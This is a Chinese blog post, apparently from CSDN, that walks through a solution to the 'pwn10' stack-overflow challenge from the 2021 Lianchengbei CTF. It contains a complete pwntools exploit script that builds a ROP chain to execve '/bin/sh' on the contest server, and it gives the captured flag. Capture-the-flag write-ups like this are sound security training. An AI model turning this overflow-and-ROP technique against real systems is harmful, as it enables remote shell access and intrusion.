2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
2021年“莲城杯”网络安全大赛-PWN-pwn10题目名称:pwn10题目内容:栈溢出。靶机:nc 183.129.189.60 10016题目分值:100.0题目难度:容易相关附件:pwn10的附件.zip解题思路:1.保护机制,静态链接,没pie2.主要函数3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址
·
2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
题目名称:pwn10
题目内容:栈溢出。靶机:nc 183.129.189.60 10016
题目分值:100.0
题目难度:容易
相关附件:pwn10的附件.zip
解题思路:
1.保护机制,静态链接,没pie
2.主要函数
3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall
```python
#!/usr/bin/env python
from pwn import *
local = 0
debug = 1
binary = "./pwn10"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
elf = ELF(binary)
context.log_level = "debug" if debug else "info"
if local:
p = process(binary)
libc = ELF(lib)
else :
p = remote("183.129.189.60","10016")
# lib = "./libc.so.6"
libc = ELF(lib)
s = lambda buf : p.send(buf)
sl = lambda buf : p.sendline(buf)
sa = lambda delim, buf : p.sendafter(delim, buf)
sal = lambda delim, buf : p.sendlineafter(delim, buf)
sh = lambda : p.interactive()
r = lambda n=None : p.recv(n)
ru = lambda delim : p.recvuntil(delim)
r7f = lambda : u64(p.recvuntil("\x7f")[-6:]+"\x00\x00")
trs = lambda addr : libc.address+addr
gadget = lambda ins : libc.search(asm(ins,arch="amd64")).next()
tohex = lambda buf : "".join("\\x%02x"%ord(_) for _ in buf)
rop = ""
rop += p64(0x00000000004016e6) # 0x00000000004016e6: pop rdi; ret;
rop += p64(0x00000000006ccd60)
rop += p64(0x0000000000401807) # 0x0000000000401807: pop rsi; ret;
rop += p64(0x0000000000000000)
rop += p64(0x0000000000442d16) # 0x0000000000442d16: pop rdx; ret;
rop += p64(0x0000000000000000)
rop += p64(0x000000000041f884) # 0x000000000041f884: pop rax; ret;
rop += p64(0x000000000000003b)
rop += p64(0x00000000004679a5) # 0x00000000004679a5: syscall; ret;
raw_input()
payload = "/bin/sh\x00"
payload += "A"*0x70
payload += rop
payload += "A"*0x100
sl(payload)
sh()
# DASCTF{c7d94ca4c9a02a430d8c677cbaea192b}
CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!
更多推荐
0
0- 0
已为社区贡献2条内容
所有评论(0)